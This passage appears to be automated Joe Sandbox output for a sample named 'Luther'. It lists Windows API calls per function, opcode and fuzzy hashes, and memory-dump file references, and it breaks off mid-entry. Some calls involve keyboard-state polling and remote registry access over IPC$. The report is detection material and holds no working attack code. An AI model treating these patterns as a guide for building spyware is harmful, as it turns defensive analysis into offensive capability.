                                                                                                          • Opcode ID: 958f0df01815fafb80cd8677c37c7c3f1f7e49db3865e65640b1248e8b138a27
                                                                                                          • Instruction ID: b0de3ec44a926ab7b9975c3fffd3c89b784c74270ac258e2978a8317ccee50fb
                                                                                                          • Opcode Fuzzy Hash: 958f0df01815fafb80cd8677c37c7c3f1f7e49db3865e65640b1248e8b138a27
                                                                                                          • Instruction Fuzzy Hash: 3851FE71A00209AFDF18CFA9DD95AAEBBB5FB48314F10813AF919F6290D771AD05CB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E31802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E31488,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E31865
                                                                                                          • DestroyWindow.USER32(?), ref: 00E31521
                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E315BB
                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00E729B4
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E729E2
                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E3145A,00000000,?), ref: 00E729F9
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E3145A,00000000), ref: 00E72A15
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00E72A27
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 641708696-0
                                                                                                          • Opcode ID: 31cea7a617359beb9907d8bff3bc1fc552f204623057c4ec7afe975b33497629
                                                                                                          • Instruction ID: c68ccf5e82b09a076886db90d25d0e86cb585b27260b1d71a6abf75937f31faa
                                                                                                          • Opcode Fuzzy Hash: 31cea7a617359beb9907d8bff3bc1fc552f204623057c4ec7afe975b33497629
                                                                                                          • Instruction Fuzzy Hash: 03618A31505705EFCB398F15DD4CB297BF1FB8032AF10A06DE14666660C772A891EB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E32234: GetWindowLongW.USER32(?,000000EB), ref: 00E32242
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00E32152
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorLongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 259745315-0
                                                                                                          • Opcode ID: 16b998e405a12922c91444d17645573acd82c0119a4029f7adc7d22e49b778de
                                                                                                          • Instruction ID: 35cf4e066f0031a98f9978c84596998a59bc9c9dbdd1617a460f1881a3ce62bf
                                                                                                          • Opcode Fuzzy Hash: 16b998e405a12922c91444d17645573acd82c0119a4029f7adc7d22e49b778de
                                                                                                          • Instruction Fuzzy Hash: 1F41C331106644AFDB209F399C4CFB93B65AB42734F145269FBE6A72E1C7329D42EB10
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00E80D31,00000001,0000138C,00000001,00000000,00000001,?,00EAEEAE,00F02430), ref: 00E9A091
                                                                                                          • LoadStringW.USER32(00000000,?,00E80D31,00000001), ref: 00E9A09A
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E80D31,00000001,0000138C,00000001,00000000,00000001,?,00EAEEAE,00F02430,?), ref: 00E9A0BC
                                                                                                          • LoadStringW.USER32(00000000,?,00E80D31,00000001), ref: 00E9A0BF
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E9A1E0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                          • API String ID: 747408836-2268648507
                                                                                                          • Opcode ID: d627a2b4dc66f7eb688fb2e76f6732c40ff74ea6b8a6fdcfa3448002f1722cbb
                                                                                                          • Instruction ID: 7deaf9f4837e84ae76813c75fe1c8b26183e4ae8528ca7cdc9fbf4ff568ed8da
                                                                                                          • Opcode Fuzzy Hash: d627a2b4dc66f7eb688fb2e76f6732c40ff74ea6b8a6fdcfa3448002f1722cbb
                                                                                                          • Instruction Fuzzy Hash: BD41657280021DAACF14FBE0DD46DEEBBB8AF14340F501065F601B6092DB765F49CBA1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E91093
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E910AF
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E910CB
                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E910F5
                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E9111D
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E91128
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E9112D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 323675364-22481851
                                                                                                          • Opcode ID: f19cd1bd1890901d80db939f2a02cb8143eca643adc3d55c1b7dccd3612b4cce
                                                                                                          • Instruction ID: 78603a855087d4df4f7d23262b45137f07c39763d3595d5fa28d16558f5da792
                                                                                                          • Opcode Fuzzy Hash: f19cd1bd1890901d80db939f2a02cb8143eca643adc3d55c1b7dccd3612b4cce
                                                                                                          • Instruction Fuzzy Hash: CE41E772C10229AFCF11EBA5DC89DEEBBB8FF04750F405169EA05B6161EB729E05CB50
                                                                                                          APIs
                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EC4AD9
                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00EC4AE0
                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EC4AF3
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00EC4AFB
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EC4B06
                                                                                                          • DeleteDC.GDI32(00000000), ref: 00EC4B10
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00EC4B1A
                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00EC4B30
                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00EC4B3C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                          • Opcode ID: e50ad666036708501058ff0c321c9e56242a08f35a0da3758e0ddfc488e65a2f
                                                                                                          • Instruction ID: d48924340310b90ecb4a2c13addb0b0f0a5ff0283d35eba14afa87043c4312c1
                                                                                                          • Opcode Fuzzy Hash: e50ad666036708501058ff0c321c9e56242a08f35a0da3758e0ddfc488e65a2f
                                                                                                          • Instruction Fuzzy Hash: 38316B71100219AFDF129F65CD08FDA3BA9FF09328F111229FA14B61A0C737D822DB94
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB46B9
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EB46E7
                                                                                                          • CoUninitialize.OLE32 ref: 00EB46F1
                                                                                                          • _wcslen.LIBCMT ref: 00EB478A
                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00EB480E
                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EB4932
                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00EB496B
                                                                                                          • CoGetObject.OLE32(?,00000000,00ED0B64,?), ref: 00EB498A
                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB499D
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EB4A21
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB4A35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 429561992-0
                                                                                                          • Opcode ID: 3385b5f7f098c692a0096e4b3c7fe6b4853626bec1bd77468df6dc3c57a6c8a3
                                                                                                          • Instruction ID: 308aa070e282a7c190bb130f063a2721cbb972c1c14161bf2bf69520e2f5161c
                                                                                                          • Opcode Fuzzy Hash: 3385b5f7f098c692a0096e4b3c7fe6b4853626bec1bd77468df6dc3c57a6c8a3
                                                                                                          • Instruction Fuzzy Hash: 1DC15AB16083019FC704DF68C8849ABB7E9FF89748F00592DF989AB251DB31ED05CB52
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EA8538
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EA85D4
                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00EA85E8
                                                                                                          • CoCreateInstance.OLE32(00ED0CD4,00000000,00000001,00EF7E8C,?), ref: 00EA8634
                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EA86B9
                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00EA8711
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00EA879C
                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EA87BF
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00EA87C6
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00EA881B
                                                                                                          • CoUninitialize.OLE32 ref: 00EA8821
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2762341140-0
                                                                                                          • Opcode ID: d93a4f0185ce83eb672f2befa7cdaa93c2125225f41c99c809857aaa35af085b
                                                                                                          • Instruction ID: 73b9aa3cb95f591a1dc554b7bbcb6d9f55a9daeacb16d3fd862aa85654e2b132
                                                                                                          • Opcode Fuzzy Hash: d93a4f0185ce83eb672f2befa7cdaa93c2125225f41c99c809857aaa35af085b
                                                                                                          • Instruction Fuzzy Hash: C0C13B75A00205AFCB04DFA4C988DAEBBF5FF49304B1490A9F519EB261DB31ED45CB90
                                                                                                          APIs
                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E9039F
                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E903F8
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00E9040A
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E9042A
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00E9047D
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E90491
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E904A6
                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E904B3
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E904BC
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E904CE
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E904D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706829360-0
                                                                                                          • Opcode ID: 179d0ab86bca42a275843b513436297633be6be61fd6ac6993f7e669b766b847
                                                                                                          • Instruction ID: 48c40788b2924d4415e69697d75a4d0f25e124a3be83eac7a9fae1aadb7f6180
                                                                                                          • Opcode Fuzzy Hash: 179d0ab86bca42a275843b513436297633be6be61fd6ac6993f7e669b766b847
                                                                                                          • Instruction Fuzzy Hash: 1F416E71A002199FCF04DFA5DC48DAEBBB9FF08354F408039EA65B7261DB31A946CB90
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00E9A65D
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E9A6DE
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00E9A6F9
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E9A713
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00E9A728
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00E9A740
                                                                                                          • GetKeyState.USER32(00000011), ref: 00E9A752
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00E9A76A
                                                                                                          • GetKeyState.USER32(00000012), ref: 00E9A77C
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E9A794
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00E9A7A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: e95042745a185110b56bb27349bc0d0dbd7fbdab2d19783ee5f59c34e78cd624
                                                                                                          • Instruction ID: c4386f6ecbec21560d1641d83d3f7124bba08dab453320ac130cc345b31cf917
                                                                                                          • Opcode Fuzzy Hash: e95042745a185110b56bb27349bc0d0dbd7fbdab2d19783ee5f59c34e78cd624
                                                                                                          • Instruction Fuzzy Hash: 6A41C8645047C96EFF315AA4C8057A5BEB0AF1134CF0C907AD5C67A1C2EBA599C8C7D3
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                          • API String ID: 707087890-567219261
                                                                                                          • Opcode ID: 4bf294b5f432b3321f7f29fd01199296b21cd2fa3f23ee4780013f1280130b99
                                                                                                          • Instruction ID: b84c33826defbe2fab51dbbfbbdabf2967070e3f95fe991351f8a9ae3a57ef26
                                                                                                          • Opcode Fuzzy Hash: 4bf294b5f432b3321f7f29fd01199296b21cd2fa3f23ee4780013f1280130b99
                                                                                                          • Instruction Fuzzy Hash: 7151E331A001169BCF14DF68C9419FFB7E5BF65368B206229EA66F7282DB31DD40C790
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32 ref: 00EB41D1
                                                                                                          • CoUninitialize.OLE32 ref: 00EB41DC
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00ED0B44,?), ref: 00EB4236
                                                                                                          • IIDFromString.OLE32(?,?), ref: 00EB42A9
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB4341
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB4393
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 636576611-1287834457
                                                                                                          • Opcode ID: 1330b5eccc966a334b56756a04019abb30855b6224041f0f7508b6ff89b414a0
                                                                                                          • Instruction ID: 866cb3a4bf2332b4e1361007df74ea1c65d9c34c19ec5a13dd90dae8152853ca
                                                                                                          • Opcode Fuzzy Hash: 1330b5eccc966a334b56756a04019abb30855b6224041f0f7508b6ff89b414a0
                                                                                                          • Instruction Fuzzy Hash: 9761CFB16083019FD710DF64D889FABBBE4AF49714F041819F981BB2A2C730ED48CB92
                                                                                                          APIs
                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00EA8C9C
                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA8CAC
                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA8CB8
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA8D55
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8D69
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8D9B
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA8DD1
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA8DDA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1464919966-438819550
                                                                                                          • Opcode ID: 775c4bd4cd96de9be40d618034e38b240e4eba25071398733639dfe1576906f8
                                                                                                          • Instruction ID: 73ef3c2beabb2db01563ae518a72af2939ac5b9130828501bdd6a96556b415a3
                                                                                                          • Opcode Fuzzy Hash: 775c4bd4cd96de9be40d618034e38b240e4eba25071398733639dfe1576906f8
                                                                                                          • Instruction Fuzzy Hash: E1616CB25043059FCB10EF60C945AAEB7E8FF99314F04582EF989A7251DB31F945CB92
                                                                                                          APIs
                                                                                                          • CreateMenu.USER32 ref: 00EC4715
                                                                                                          • SetMenu.USER32(?,00000000), ref: 00EC4724
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC47AC
                                                                                                          • IsMenu.USER32(?), ref: 00EC47C0
                                                                                                          • CreatePopupMenu.USER32 ref: 00EC47CA
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC47F7
                                                                                                          • DrawMenuBar.USER32 ref: 00EC47FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                          • String ID: 0$F
